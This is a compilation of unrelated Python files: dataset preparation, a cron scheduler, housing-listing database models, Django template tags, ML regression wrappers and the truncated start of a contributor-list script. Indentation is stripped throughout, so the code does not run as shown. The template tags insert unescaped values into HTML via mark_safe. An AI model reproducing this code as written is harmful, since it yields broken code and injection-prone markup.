img_dir = './data/VOCdevkit2007/VOC2007/JPEGImages/'
anno_dir = './data/VOCdevkit2007/VOC2007/Annotations/'
fd = open('./data/VOCdevkit2007/VOC2007/ImageSets/Main/', 'wt')
count = 0
dir_temp = os.path.abspath(in_dir)
for (root, dirs, files) in os.walk(dir_temp):
for file in files:
ext = file[len(file)-3:len(file)]
if ext == 'jpg':
img = cv2.imread(in_dir+file)
cv2.imwrite(img_dir+'in'+str(count)+'.jpg', img)
count = count+1
try:
os.remove('./data/VOCdevkit2007/VOC2007/ImageSets/Main/test.txt_annots.pkl')
except:
print("No such file!")
dir = os.path.abspath(img_dir)
tree = ET.parse(anno_dir+'dummy.xml')
for (root, dirs, files) in os.walk(dir):
for file in files:
if(file[:2]=='in'):
name = file[:len(file)-4]
fd.write(name+'\n')
tree.write(anno_dir+name+'.xml')
fd.close()
|
# -*- coding: utf-8 -*-
from crontab import CronTab
class CrontabControl:
def __init__(self):
self.cron = CronTab()
self.job = None
self.all_job = None
def write_job(self, command, schedule, file_name):
self.job = self.cron.new(command=command)
self.job.setall(schedule)
self.cron.write(file_name)
def read_jobs(self, file_name):
self.all_job = CronTab(tabfile=file_name)
def monitor_start(self, file):
self.read_jobs(file)
for result in self.all_job.run_scheduler():
print('予定していたスケジュールを実行しました。')
def main():
command = 'python ./regular_post.py'
schedule = '0 20 * * *'
file = 'output.tab'
c = CrontabControl()
c.write_job(command, schedule, file)
c.monitor_start(file)
if __name__ == '__main__':
main()
|
import os
import json
from data_classes import SingleCharacter, BaseMod
def run_test():
# load main config
with open('main_config.json', 'r') as f:
cfg = json.load(f, strict=False)
print('Hello, and Welcome to the CrusaderAI Manager!')
print('=====')
print('Choose a base-mod:')
for i, bm in enumerate(cfg['installed_base_mods']):
print('%i) ' % i + bm)
num = int(input("Please enter a number:"))
base = BaseMod(os.path.join('data', 'mod_base', cfg['installed_base_mods'][num]), cfg['vanilla_dir'])
print('=====')
print('Choose a ai-mod to add to base:')
for i, bm in enumerate(cfg['installed_mods']):
print('%i) ' % i + bm)
num = int(input("Please enter a number:"))
char = SingleCharacter(os.path.join('data', cfg['installed_mods'][num]))
print('=====')
rc = input('Enter a Characters Name to replace ai with:')
base.update_character(char, rc)
base.save_base_mod(cfg['out_dir'])
if __name__ == '__main__':
run_test()
|
# -*- coding: utf-8 -*-
#
# @Author: lijiancheng0614
# @Date: 2020-03-06
#
"""Model.
"""
import datetime
from peewee import (BigIntegerField, BooleanField, CharField, CompositeKey,
DateTimeField, FloatField, Model, MySQLDatabase,
PostgresqlDatabase, SqliteDatabase)
from settings import DBENGINE, DBHOST, DBNAME, DBPASSWORD, DBPORT, DBUSER
if DBENGINE.lower() == 'sqlite3':
DATABASE = SqliteDatabase(DBNAME)
elif DBENGINE.lower() == 'mysql':
DATABASE = MySQLDatabase(
DBNAME,
host=DBHOST,
port=DBPORT,
user=DBUSER,
passwd=DBPASSWORD,
charset='utf8',
use_unicode=True,
)
elif DBENGINE.lower() == 'postgresql':
DATABASE = PostgresqlDatabase(
DBNAME,
user=DBUSER,
password=DBPASSWORD,
host=DBHOST,
charset='utf8',
use_unicode=True,
)
else:
raise AttributeError("Please setup DBENGINE at settings.py")
class BaseModel(Model):
"""Base model.
"""
class Meta:
"""Meta.
"""
database = DATABASE
class Community(BaseModel):
"""Community.
"""
NAME_DICT = {
u'交易权属': 'trading_right',
u'产权年限': 'property_right_years',
u'供暖类型': 'heating_type',
u'供暖费用': 'heating_cost',
u'停车费用': 'parking_cost',
u'固定车位数': 'parking_place_number',
u'容积率': 'volume_ratio',
u'建成年代': 'building_finish_year',
u'建筑类型': 'building_type',
u'开发企业': 'development_company',
u'房屋用途': 'house_type',
u'燃气费用': 'gas_cost',
u'物业公司': 'property_management_company',
u'物业电话': 'property_management_phone_number',
u'物业费用': 'property_management_cost',
u'用水类型': 'water_use_type',
u'用电类型': 'power_consumption_type',
u'绿化率': 'green_coverage',
u'附近学校': 'nearby_schools',
u'楼栋总数': 'building_number',
u'建筑面积': 'built_area',
u'人车分流': 'separation_pedestrian_vehicular',
u'占地面积': 'covered_area',
u'是否封闭': 'close',
u'总户数': 'house_number',
u'电梯房': 'elevator',
u'建筑品质': 'score_building_quality',
u'户型设计': 'score_apartment_layout_design',
u'交通条件': 'score_traffic_condition',
u'教育质量': 'score_education_quality',
u'商业环境': 'score_business_environment',
u'花园景观': 'score_garden_View',
u'物业管理': 'score_property_management',
u'游泳池': 'is_swimming_pool',
u'小区花园': 'is_community_garden',
u'运动场地': 'is_sports_ground',
u'康乐设施': 'is_recreational_facility',
u'会所': 'is_club',
u'健身房': 'is_gym',
u'大堂': 'is_lobby',
u'活动中心': 'is_activity_center',
u'水系': 'is_river_system',
u'儿童游乐': 'is_playground'
}
community_id = BigIntegerField(primary_key=True)
title = CharField(null=True) # 标题
link = CharField(unique=True) # 链接
district = CharField(null=True) # 区域
bizcircle = CharField(null=True) # 商圈
intro = CharField(null=True) # 介绍
tags = CharField(null=True) # 标签列表
onsale = CharField(null=True) # 在售套数
onrent = CharField(null=True) # 在租套数
building_number = CharField(null=True) # 楼栋总数
house_number = CharField(null=True) # 总户数
average_unit_price = CharField(null=True) # 均价
building_finish_year = CharField(null=True) # 建成年代
built_area = CharField(null=True) # 建筑面积
covered_area = CharField(null=True) # 占地面积
house_type = CharField(null=True) # 房屋用途
property_right_years = CharField(null=True) # 产权年限
building_type = CharField(null=True) # 建筑类型
development_company = CharField(null=True) # 开发企业
trading_right = CharField(null=True) # 交易权属
property_management_company = CharField(null=True) # 物业公司
property_management_cost = CharField(null=True) # 物业费用
property_management_phone_number = CharField(null=True) # 物业电话
heating_type = CharField(null=True) # 供暖类型
heating_cost = CharField(null=True) # 供暖费用
water_use_type = CharField(null=True) # 用水类型
power_consumption_type = CharField(null=True) # 用电类型
parking_place_number = CharField(null=True) # 固定车位数
parking_cost = CharField(null=True) # 停车费用
gas_cost = CharField(null=True) # 燃气费用
volume_ratio = CharField(null=True) # 容积率
green_coverage = CharField(null=True) # 绿化率
separation_pedestrian_vehicular = CharField(null=True) # 人车分流
close = CharField(null=True) # 是否封闭
elevator = CharField(null=True) # 是否电梯房
nearby_schools = CharField(null=True) # 附近学校
score = FloatField(null=True) # 评分
score_building_quality = FloatField(null=True) # 建筑品质
score_apartment_layout_design = FloatField(null=True) # 户型设计
score_traffic_condition = FloatField(null=True) # 交通条件
score_education_quality = FloatField(null=True) # 教育质量
score_business_environment = FloatField(null=True) # 商业环境
score_garden_View = FloatField(null=True) # 花园景观
score_property_management = FloatField(null=True) # 物业管理
good_point = CharField(null=True) # 优点
bad_point = CharField(null=True) # 弱点
is_swimming_pool = BooleanField(null=True) # 游泳池
is_community_garden = BooleanField(null=True) # 小区花园
is_sports_ground = BooleanField(null=True) # 运动场地
is_recreational_facility = BooleanField(null=True) # 康乐设施
is_club = BooleanField(null=True) # 会所
is_gym = BooleanField(null=True) # 健身房
is_lobby = BooleanField(null=True) # 大堂
is_activity_center = BooleanField(null=True) # 活动中心
is_river_system = BooleanField(null=True) # 水系
is_playground = BooleanField(null=True) # 儿童游乐
valid_date = DateTimeField(default=datetime.datetime.now) # 更新时间
class House(BaseModel):
"""House.
"""
house_id = BigIntegerField(primary_key=True)
title = CharField(null=True) # 标题
link = CharField(null=True) # 链接
intro = CharField(null=True) # 介绍
community = CharField(null=True) # 所在小区
total_price = CharField(null=True) # 总价
unit_price = CharField(null=True) # 单价
images = CharField(null=True) # 图片
layout = CharField(null=True) # 房屋户型
structure = CharField(null=True) # 户型结构
built_area = CharField(null=True) # 建筑面积
usable_area = CharField(null=True) # 套内面积
orientation = CharField(null=True) # 房屋朝向
floor = CharField(null=True) # 所在楼层
building_type = CharField(null=True) # 建筑类型
building_structure = CharField(null=True) # 建筑结构
decoration_type = CharField(null=True) # 装修情况
elevator = CharField(null=True) # 配备电梯
heating_type = CharField(null=True) # 供暖类型
stairs_and_households = CharField(null=True) # 梯户比例
building_finish_year = CharField(null=True) # 建成年代
property_right_years = CharField(null=True) # 产权年限
trading_right = CharField(null=True) # 交易权属
listing_time = DateTimeField(null=True) # 挂牌时间
house_type = CharField(null=True) # 房屋用途
life_years = CharField(null=True) # 房屋年限
ownership = CharField(null=True) # 房权所属
valid_date = DateTimeField(default=datetime.datetime.now) # 更新时间
class HistoryPrice(BaseModel):
"""History price.
"""
house_id = CharField()
total_price = CharField()
date = DateTimeField(default=datetime.datetime.now)
class Meta:
"""Meta.
"""
primary_key = CompositeKey('house_id', 'total_price')
class Sell(BaseModel):
"""Sell.
"""
house_id = CharField(primary_key=True)
title = CharField(null=True)
link = CharField(null=True)
community = CharField(null=True)
years = CharField(null=True)
house_type = CharField(null=True)
square = CharField(null=True)
direction = CharField(null=True)
floor = CharField(null=True)
status = CharField(null=True)
source = CharField(null=True)
total_price = CharField(null=True)
unit_price = CharField(null=True)
dealdate = CharField(null=True)
update_date = DateTimeField(default=datetime.datetime.now)
class Rent(BaseModel):
"""Rent.
"""
house_id = CharField(primary_key=True)
title = CharField(null=True)
link = CharField(null=True)
region = CharField(null=True)
zone = CharField(null=True)
meters = CharField(null=True)
other = CharField(null=True)
subway = CharField(null=True)
decoration_type = CharField(null=True)
heating = CharField(null=True)
price = CharField(null=True)
pricepre = CharField(null=True)
update_date = DateTimeField(default=datetime.datetime.now)
def init():
"""Init database.
"""
DATABASE.connect()
# DATABASE.create_tables([Community, House, HistoryPrice, Sell, Rent],
# safe=True)
DATABASE.create_tables([Community], safe=True)
DATABASE.close()
|
# -*- coding: utf-8 -*-
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Authors: Luc LEGER / Coopérative ARTEFACTS <artefacts.lle@gmail.com>
from django import template
from django.utils.translation import gettext_lazy as _
from francoralite_front.errors import APPLICATION_ERRORS
from django.utils.safestring import mark_safe
register = template.Library()
@register.simple_tag
def field_data(label, data, empty=True):
try:
str_label = str(label)
except Exception:
str_label = label
try:
str_data = str(data)
if str_data == "None":
str_data = ""
except Exception:
str_data = data
if empty is False and str_data == "":
code = ""
else:
code = "<dl class=\"container_data\"><dt class=\"libelle\">"
code = code + str_label + "</dt> <dd class=\"donnee\" >"
code = code + str_data + "</dd> </dl>"
return mark_safe(code)
@register.simple_tag
def field_data_id(field, data, empty=True):
try:
str_label = str(field.label)
except Exception:
str_label = field.label
try:
str_data = str(data)
if str_data == "None":
str_data = ""
except Exception:
str_data = data
if empty is False and str_data == "":
code = ""
else:
code = "<dl class=\"container_data\"><dt class=\"libelle\">"
code = code + str_label + "</dt> <dd id=\"" + field.id_for_label + "\" class=\"donnee\" >"
code = code + str_data + "</dd> </dl>"
return mark_safe(code)
@register.simple_tag
def field_data_bool(label, data):
icon = ""
if data is True:
icon = "glyphicon-ok "
code = "<dl class=\"container_data\"><dt class=\"libelle\">"
code = code + str(label) + "</dt> <dd class=\" center glyphicon "
code = code + icon + "donnee\" >"
code = code + "</dd> </dl>"
return mark_safe(code)
@register.simple_tag
def display_error(error="0"):
url_error = {
'HTTP_API_401': 'inc/non_authentified.html',
'HTTP_API_404': 'inc/not_present.html',
'KEY_ERROR': 'inc/key_error.html',
}
code = error
for key, value in url_error.items():
if error == APPLICATION_ERRORS[key]:
code = template.loader.get_template(value)
if error != "0" and error != '':
# Display the code of the error
html = "<i>ERR : " + error + "</i>"
# Render the template to HTML source code
if isinstance(code, template.__class__):
html += code.render()
return html
return mark_safe(code)
@register.inclusion_tag('inc/modal-delete.html')
def modal_delete():
return {}
@register.inclusion_tag('inc/select-vue-item.html', takes_context=True)
def select_vue_item(context):
if 'id' in context:
return {
'id': context['id'],
}
return {}
@register.inclusion_tag('inc/select-vue-collection.html', takes_context=True)
def select_vue_collection(context):
if 'id' in context:
return {
'id': context['id'],
}
return {}
@register.inclusion_tag('inc/buttons-form.html', takes_context=True)
def buttons_form(context):
request = context['request']
url_back = "#"
if 'HTTP_REFERER' in request.META:
url_back = request.META['HTTP_REFERER']
return {'url_back': url_back}
@register.filter
def virgule(self):
return str(self).replace(",", ".")
@register.filter
def public_access(self):
choices = {}
choices['none'] = _(u"Aucun")
choices['metadata'] = _(u"Meta-données")
choices['partial'] = _(u"Partiel")
choices['full'] = _(u"Complet")
return choices[self]
@register.filter
def domains(self):
values = str(self)
labels = ""
DOMAINS = (
('T', _(u"Témoignage")),
('C', _(u"Chanson")),
('A', _(u"Autre expression vocale")),
('I', _(u"Expression instrumentale")),
('R', _(u"Conte ou récit légendaire"))
)
for (d, lib) in DOMAINS:
if d in values:
if len(labels) > 0:
labels = labels + ", "
labels = labels + str(lib)
return labels
@register.filter
def get_obj_attr(obj, attr):
return obj[attr]
@register.inclusion_tag('inc/related-list.html')
def related_list(*args, **kwargs):
return {
'libelle': kwargs.get('libelle', ""),
'items': kwargs['items'],
'url_detail': kwargs.get('url_detail', ""),
'field': kwargs['field'],
'field2': kwargs.get('field2', ""),
'empty': kwargs.get('empty', True),
}
@register.inclusion_tag('inc/display_documents.html', takes_context=True)
def display_documents(context):
if 'documents' in context:
return {
'documents': context['documents'],
}
return {}
@register.inclusion_tag('inc/nakala_button.html')
def nakala_button(*args, **kwargs):
return{}
|
import csv
import pandas as pd
import os
import numpy as np
BASE_DIR = os.getcwd()
def merge_dev_data(result_filename, file_pos, file_neg):
"""
Description: function that merges dev data from both
sentiments into a single data structure
Input:
-result_filename: str, name of the file to write the result to
-file_pos: str, name of file containing positive dev data
-file_neg: str, name of file containing negative dev data
"""
merged_data = []
with open(file_pos, errors="replace") as text:
txt = text.readlines()
merged_data += [(line, "positive") for line in txt]
text.close()
with open(file_neg, errors="replace") as text:
txt = text.readlines()
merged_data += [(line, "negative") for line in txt]
text.close()
df = pd.DataFrame(merged_data, columns=["text", "sentiment"])
df["text"] = df["text"].apply(lambda x: x.strip())
df = df.replace("", np.nan)
df = df[df["text"].notnull()]
df.to_csv(result_filename, index=False)
def merge_training_data(result_filename, original_dir, sentiment):
"""
Description: function that merges the training text files
for the positive and negative directories
Input:
-result_filename_pos: str, name of the file that will contain
training data for the given sentiment
-original_dir: str, the directory containing the text files
-sentiment: str, the sentiment of the given text files
"""
df = pd.DataFrame()
for filename in os.listdir(original_dir):
with open(f"{original_dir}/{filename}", errors="replace") as text:
txt = text.readlines()
data = pd.DataFrame(list(zip(txt, [sentiment] * len(txt))))
df = df.append(data)
text.close()
df.columns = ["text", "sentiment"]
df["text"] = df["text"].apply(lambda x: x.strip())
df = df.replace("", np.nan)
df = df.dropna()
df.to_csv(result_filename, index=False)
# Specify result directory
result_dir = os.path.join(BASE_DIR, "sentiment_analysis/corpora/processed/rottentomatoes/")
# Specify positive and negative training paths
training_positive_path = os.path.join(
BASE_DIR, "sentiment_analysis/corpora/raw/review_polarity/txt_sentoken/pos"
)
training_negative_path = os.path.join(
BASE_DIR, "sentiment_analysis/corpora/raw/review_polarity/txt_sentoken/neg"
)
# Merge the training text files for positive and negative
merge_training_data(
f"{result_dir}positive_training.csv", training_positive_path, "positive"
)
merge_training_data(
f"{result_dir}negative_training.csv", training_negative_path, "negative"
)
# Merge the development data and save it to a .csv file
dev_positive_path = os.path.join(
BASE_DIR, "sentiment_analysis/corpora/raw/rt-polaritydata/rt-polaritydata/rt-polarity.pos"
)
dev_negative_path = os.path.join(
BASE_DIR, "sentiment_analysis/corpora/raw/rt-polaritydata/rt-polaritydata/rt-polarity.neg"
)
merge_dev_data(
f"{result_dir}development_data.csv", dev_positive_path, dev_negative_path
)
|
from django import forms
from .models import PushInformation, SubscriptionInfo
class SimplePushForm(forms.Form):
status_type = forms.ChoiceField(choices=[
('subscribe', 'subscribe'),
('unsubscribe', 'unsubscribe')
])
def save_or_delete(self, subscription, user, status_type):
data = {}
if user.is_authenticated():
data["user"] = user
data["subscription"] = subscription
push_info, created = PushInformation.objects.get_or_create(**data)
# If unsubscribe is called, that means need to delete the browser
# and notification info from server.
if status_type == "unsubscribe":
push_info.delete()
subscription.delete()
class SubscriptionForm(forms.ModelForm):
class Meta:
model = SubscriptionInfo
fields = ('browser', 'endpoint', 'auth', 'p256dh')
def get_or_save(self, subscription_data):
subscription, created = SubscriptionInfo.objects.get_or_create(**subscription_data)
return subscription
|
#!/usr/bin/env python3
#
# This example demonstrates how to write colored text to STDOUT.
# In this case RGB colors are generated. Please note that this might not work
# on older systems if RGB is not supported.
#
from jk_console import Console
def rangef(start, end, step):
v = start
while v <= end:
yield v
v += step
#
Console.clear()
for _s in rangef(0, 100, 3):
for _h in rangef(0, 100, 0.8):
h = _h/100.0
s = _s/100.0
c = Console.BackGround.hsl1(h, s, 0.5)
print(c + " ", end="")
print(Console.RESET)
print()
|
import example_ghactions
def test_cli():
example_ghactions.show(["27"])
|
from .lq_conv2d import *
|
# -*- coding: utf-8 -*-
'''Models application.'''
import treatment
# from cross_validation import multi_cross_validation
import numpy as np
import pandas as pd
import xgboost as xgb
from sklearn.metrics import mean_squared_error, r2_score
from sklearn.model_selection import train_test_split
from sklearn.linear_model import RidgeCV, LinearRegression
from sklearn.svm import SVR
#-------------------------------------------------------------------------------
# MODELS
#------------------------------------------------------------------------------
# XGBoost IMPLEMENTATION
param = {'max_depth': 10, 'eta': 1, 'silent': 1, 'subsample': 0.8, #default parameters for easyXGB constuctor
'reg_alpha': 0.7, 'tree_method': 'auto'}
class easyXGB :
'''Wrapper to use XGBooster models with sklearn methods.
Implement fit, predict and score.
'''
def __init__(self, load=0, params_=param, scorer = 'MSE'):
self.params = {} if (params_ is None) else params_
self._scorer = scorer
if load in range(1,5):
self.model = xgb.Booster()
self.model.load_model('reg_{i}.model'.format(i=load))
def set_params(self, **kwargs):
for name in kwargs:
self.params[name] = kwargs[name]
def fit(self, X_train, y_train, **parameters):
'''Wrapper for xgb fit function
Fit the easyXGB model to y_train and X_train.'''
self.set_params(**parameters)
dtrain = xgb.DMatrix(X_train, label=y_train)
self.model = xgb.train(params=self.params, dtrain=dtrain)
def predict(self, X_test):
'''Wrapper for xgb prediction function
Returns predited values for X_test observations.'''
dtest = xgb.DMatrix(X_test)
return self.model.predict(dtest)
def score(self, X_test, y_test):
y_pred = self.predict(X_test)
if self._scorer == 'MSE':
return mean_squared_error(y_test, y_pred)
elif self._scorer == 'R2':
return r2_score(y_test, y_pred)
else :
raise NotImplementedError
def save(self, number):
if number in range(1,5):
self.model.save_model('reg_{i}.model'.format(i=number))
else :
raise NotImplementedError
class XGBImplement:
'''Model that include easyXGB implentation for the 4 responses.
Methods:
predict(self, X_test) Predict values for the log of 'k1_bwd_effective','k1_fwd_effective', 'k2_bwd_effective','k2_fwd_effective' using our model.
Variables:
scores Contains scores on test and train predictions as a pandas DataFrame.
'''
def __init__(self, random_state = 33, realization_split = False):
y1, y2, y3, y4, X, realization = treatment.data_initialization(realiz=True)
X = X.drop(columns=['sigma_mass_0.0', 'sigma_mass_0.825', 'enzyme_concentration'])
X = X.values
self.k1_bkw_model = easyXGB(params_= {'reg_alpha': 0.33684210526315794, 'eta': 0.7, 'max_depth': 9, 'subsample': 1.0}, scorer='R2')
self.k1_fwd_model = easyXGB(params_= {'reg_alpha': 0.9, 'eta': 0.6, 'max_depth': 4, 'subsample': 1.0}, scorer='R2')
self.k2_bkw_model = easyXGB(params_= {'reg_alpha': 0.95, 'eta': 0.65, 'max_depth': 4, 'subsample': 1.0}, scorer='R2')
self.k2_fwd_model = easyXGB(params_= {'reg_alpha': 0.4, 'eta': 0.66, 'max_depth': 10, 'subsample': 1.0}, scorer='R2')
indices = ['k1_bwd_effective','k1_fwd_effective', 'k2_bwd_effective','k2_fwd_effective']
self.scores = pd.DataFrame({'R^2 train score': 4*[0], 'R^2 test score': 4*[0],
'MSE train score': 4*[0], 'MSE test score': 4*[0]},
index = indices)
iterator = [(self.k1_bkw_model, y1, indices[0]), (self.k1_fwd_model, y2, indices[1]),
(self.k2_bkw_model, y3, indices[2]), (self.k2_fwd_model, y4, indices[3])]
for model, y, index in iterator:
X_train, X_test, y_train, y_test = treatment.train_test_split(X, y, test_size=0.4, random_state = random_state) if not realization_split else treatment.train_test_split_realiz(X, y, realization, test_size=0.4, random_state = random_state)
model.fit(X_train, y_train)
y_pred_tr = model.predict(X_train)
y_pred_te = model.predict(X_test)
#['R^2 train score', 'R^2 test score', 'MSE train score', 'MSE test score']
self.scores.loc[index] = model.score(X_train, y_train), model.score(X_test, y_test), mean_squared_error(y_train, y_pred_tr), mean_squared_error(y_test, y_pred_te)
def predict(self, X_test):
''' Predict values for the log of 'k1_bwd_effective','k1_fwd_effective', 'k2_bwd_effective','k2_fwd_effective' using our model.
Returns pandas DataFrame with columns k1_bwd_pred, k1_fwd_pred, k2_bwd_pred, k2_fwd_pred (logscaled)
'''
X = X_test.drop(columns=['sigma_mass_0.0', 'sigma_mass_0.825', 'enzyme_concentration'])
X = X.values
y1 = self.k1_bkw_model.predict(X)
y2 = self.k1_fwd_model.predict(X)
y3 = self.k2_bkw_model.predict(X)
y4 = self.k2_fwd_model.predict(X)
Y_pred = pd.DataFrame({'k1_bwd_pred': y1, 'k1_fwd_pred': y2,
'k2_bwd_pred': y3, 'k2_fwd_pred': y4})
return Y_pred
#-------------------------------------------------------------------------------
# Ridge
class RidgeImplement:
'''Wrapper of sklearn RidgeCV for our purpose.
Methods:
predict(self, X_test) Predict values for the log of 'k1_bwd_effective','k1_fwd_effective', 'k2_bwd_effective','k2_fwd_effective' using our model.
Variables:
scores Contains scores on test and train predictions as a pandas DataFrame.
'''
def __init__(self, degree=2, interaction_only=False, random_state = 7, realization_split = False):
y1, y2, y3, y4, X, realization = treatment.data_initialization(realiz=True)
X = treatment.polynomial_data(X, degree, interaction_only, categories=True)
self.degree = degree
self.interaction_only = interaction_only
self.k1_bkw_model = RidgeCV(alphas=np.logspace(-5,5,40), cv=None, fit_intercept=False)
self.k1_fwd_model = RidgeCV(alphas=np.logspace(-5,5,60), cv=None, fit_intercept=False)
self.k2_bkw_model = RidgeCV(alphas=np.logspace(-5,5,60), cv=None, fit_intercept=False)
self.k2_fwd_model = RidgeCV(alphas=np.logspace(-5,5,40), cv=None, fit_intercept=False)
indices = ['k1_bwd_effective','k1_fwd_effective', 'k2_bwd_effective','k2_fwd_effective']
self.scores = pd.DataFrame({'R^2 train score': 4*[0], 'R^2 test score': 4*[0],
'MSE train score': 4*[0], 'MSE test score': 4*[0]},
index = indices)
iterator = [(self.k1_bkw_model, y1, indices[0]), (self.k1_fwd_model, y2, indices[1]),
(self.k2_bkw_model, y3, indices[2]), (self.k2_fwd_model, y4, indices[3])]
for model, y, index in iterator:
X_train, X_test, y_train, y_test = treatment.train_test_split(X, y, test_size=0.4, random_state = random_state) if not realization_split else treatment.train_test_split_realiz(X, y, realization, test_size=0.4, random_state = random_state)
model.fit(X_train, y_train)
y_pred_tr = model.predict(X_train)
y_pred_te = model.predict(X_test)
#['R^2 train score', 'R^2 test score', 'MSE train score', 'MSE test score']
self.scores.loc[index] = model.score(X_train, y_train), model.score(X_test, y_test), mean_squared_error(y_train, y_pred_tr), mean_squared_error(y_test, y_pred_te)
def predict(self, X_test):
''' Predict values for the log of 'k1_bwd_effective','k1_fwd_effective', 'k2_bwd_effective','k2_fwd_effective' using our model.
Returns pandas DataFrame with columns k1_bwd_pred, k1_fwd_pred, k2_bwd_pred, k2_fwd_pred (logscaled)
'''
X = treatment.polynomial_data(X_test, self.degree, self.interaction_only, categories=True)
y1 = self.k1_bkw_model.predict(X)
y2 = self.k1_fwd_model.predict(X)
y3 = self.k2_bkw_model.predict(X)
y4 = self.k2_fwd_model.predict(X)
Y_pred = pd.DataFrame({'k1_bwd_pred': y1, 'k1_fwd_pred': y2,
'k2_bwd_pred': y3, 'k2_fwd_pred': y4})
return Y_pred
#-------------------------------------------------------------------------------
# Support vector regression
class SVRImplement:
'''Wrapper of sklearn Support vector regression for our purpose.
Methods:
predict(self, X_test) Predict values for the log of 'k1_bwd_effective','k1_fwd_effective', 'k2_bwd_effective','k2_fwd_effective' using our model.
Variables:
scores Contains scores on test and train predictions as a pandas DataFrame.
'''
def __init__(self, interactions=True, random_state = 5, realization_split = False):
y1, y2, y3, y4, X, realization = treatment.data_initialization(realiz=True)
X = treatment.polynomial_data(X, 2, interaction_only=True, categories=True) if interactions else X
self.k1_bkw_model = SVR(kernel='rbf', max_iter=5*10**4, cache_size=3000)
self.k1_fwd_model = SVR(kernel='rbf', max_iter=5*10**4, cache_size=3000)
self.k2_bkw_model = SVR(kernel='rbf', max_iter=5*10**4, cache_size=3000)
self.k2_fwd_model = SVR(kernel='rbf', max_iter=5*10**4, cache_size=3000)
indices = ['k1_bwd_effective','k1_fwd_effective', 'k2_bwd_effective','k2_fwd_effective']
self.scores = pd.DataFrame({'R^2 train score': 4*[0], 'R^2 test score': 4*[0],
'MSE train score': 4*[0], 'MSE test score': 4*[0]},
index = indices)
iterator = [(self.k1_bkw_model, y1, indices[0]), (self.k1_fwd_model, y2, indices[1]),
(self.k2_bkw_model, y3, indices[2]), (self.k2_fwd_model, y4, indices[3])]
for model, y, index in iterator:
X_train, X_test, y_train, y_test = treatment.train_test_split(X, y, test_size=0.4, random_state = random_state) if not realization_split else treatment.train_test_split_realiz(X, y, realization, test_size=0.4, random_state = random_state)
model.fit(X_train, y_train)
y_pred_tr = model.predict(X_train)
y_pred_te = model.predict(X_test)
#['R^2 train score', 'R^2 test score', 'MSE train score', 'MSE test score']
self.scores.loc[index] = model.score(X_train, y_train), model.score(X_test, y_test), mean_squared_error(y_train, y_pred_tr), mean_squared_error(y_test, y_pred_te)
def predict(self, X_test):
''' Predict values for the log of 'k1_bwd_effective','k1_fwd_effective', 'k2_bwd_effective','k2_fwd_effective' using our model.
Returns pandas DataFrame with columns k1_bwd_pred, k1_fwd_pred, k2_bwd_pred, k2_fwd_pred (logscaled)
'''
X = treatment.polynomial_data(X_test, 2, categories=True)
y1 = self.k1_bkw_model.predict(X)
y2 = self.k1_fwd_model.predict(X)
y3 = self.k2_bkw_model.predict(X)
y4 = self.k2_fwd_model.predict(X)
Y_pred = pd.DataFrame({'k1_bwd_pred': y1, 'k1_fwd_pred': y2,
'k2_bwd_pred': y3, 'k2_fwd_pred': y4})
return Y_pred
#-------------------------------------------------------------------------------
# REGRESSIONS
def reproduction_ridge(csv = False, degree=2, interaction_only=False, random_state = 7, realization_split = False):
'''Ridge reproduction.
This function reproduces the various ridge regressions prosented in paper,
fitting a CV ridge regression for the logarithms of 'k1_bwd_effective','k1_fwd_effective',
'k2_bwd_effective','k2_fwd_effective', as explained in the paper.
Returns the model.
Arguments:
-csv True by default. If true the function output the predictions in a
.csv file.
-degree 2 by default. Degree of polynomial expansion.
-interaction_only False by default. If true the polynomial expansion only contains degree one terms and cross products.
-random_state: 7 by default (used in regressions).
-realization_split: False by default. If False performs usual traint-test split, if True
performs train-test split realization-wise.
'''
#y1, y2, y3, y4, X = treatment.data_initialization()
fitted_model = RidgeImplement(degree, interaction_only, random_state, realization_split)
if csv:
_, _, _, _, X = treatment.data_initialization()
Y_pred = fitted_model.predict(X)
Y_pred.to_csv('../results/Ridge_reproduction.csv')
return fitted_model
def reproduction_svr(csv = False, interactions=True, random_state = 5, realization_split = False):
'''Support Vector Regression reproduction.
This function reproduces the SVR prosented in paper,
fitting four models for the logarithms of 'k1_bwd_effective','k1_fwd_effective',
'k2_bwd_effective','k2_fwd_effective', as explained in the paper.
Returns the model.
Arguments:
-csv True by default. If true the function output the predictions in a
.csv file.
-interactions If True (default) fits SVR on the interaction model, else fits it to the basic design matrix.
-random_state: 5 by default (used in regressions).
-realization_split: False by default. If False performs usual traint-test split, if True
performs train-test split realization-wise.
'''
#y1, y2, y3, y4, X = treatment.data_initialization()
fitted_model = SVRImplement(interactions, random_state, realization_split)
if csv:
_, _, _, _, X = treatment.data_initialization()
Y_pred = fitted_model.predict(X)
Y_pred.to_csv('../results/SVR_reproduction.csv')
return fitted_model
def reproduction_XGBoost(csv = False, random_state = 33, realization_split = False):
'''XGBoost reproduction.
This function reproduces the best XGBoost regressions obtained,
fitting four models for the logarithms of 'k1_bwd_effective','k1_fwd_effective',
'k2_bwd_effective','k2_fwd_effective', as explained in the paper.
Returns the model.
Arguments:
-csv True by default. If true the function output the predictions in a
.csv file.
-random_state: 33 by default (used in regressions).
-realization_split: False by default. If False performs usual traint-test split, if True
performs train-test split realization-wise.
'''
#y1, y2, y3, y4, X = treatment.data_initialization()
fitted_model = XGBImplement(random_state, realization_split)
if csv:
_, _, _, _, X = treatment.data_initialization()
Y_pred = fitted_model.predict(X)
Y_pred.to_csv('../results/XGB_reproduction.csv')
return fitted_model
|
"""
Generate the contributors database.
FIXME: replace `requests` calls with the HTTPie API, when available.
"""
import json
import os
import re
import sys
from copy import deepcopy
from datetime import datetime
from pathlib import Path
from subprocess import check_output
from time import sleep
from typing import Any, Dict, Optional, Set
import requests
FullNames = Set[str]
GitHubLogins = Set[str]
Person = Dict[str, str]
People = Dict[str, Person]
UserInfo = Dict[str, Any]
CO_AUTHORS = re.compile(r'Co-authored-by: ([^<]+) <').finditer
API_URL = 'https://api.github.com'
REPO = OWNER = 'httpie'
REPO_URL = f'{API_URL}/repos/{REPO}/{OWNER}'
HERE = Path(__file__).parent
DB_FILE = HERE / 'people.json'
DEFAULT_PERSON: Person = {'committed': [], 'reported': [], 'github': '', 'twitter': ''}
SKIPPED_LABELS = {'invalid'}
GITHUB_TOKEN = os.getenv('GITHUB_TOKEN')
assert GITHUB_TOKEN, 'GITHUB_TOKEN envar is missing'
class FinishedForNow(Exception):
"""Raised when remaining GitHub rate limit is zero."""
def main(previous_release: str, current_release: str) -> int:
since = release_date(previous_release)
until = release_date(current_release)
contributors = load_awesome_people()
try:
committers = find_committers(since, until)
reporters = find_reporters(since, until)
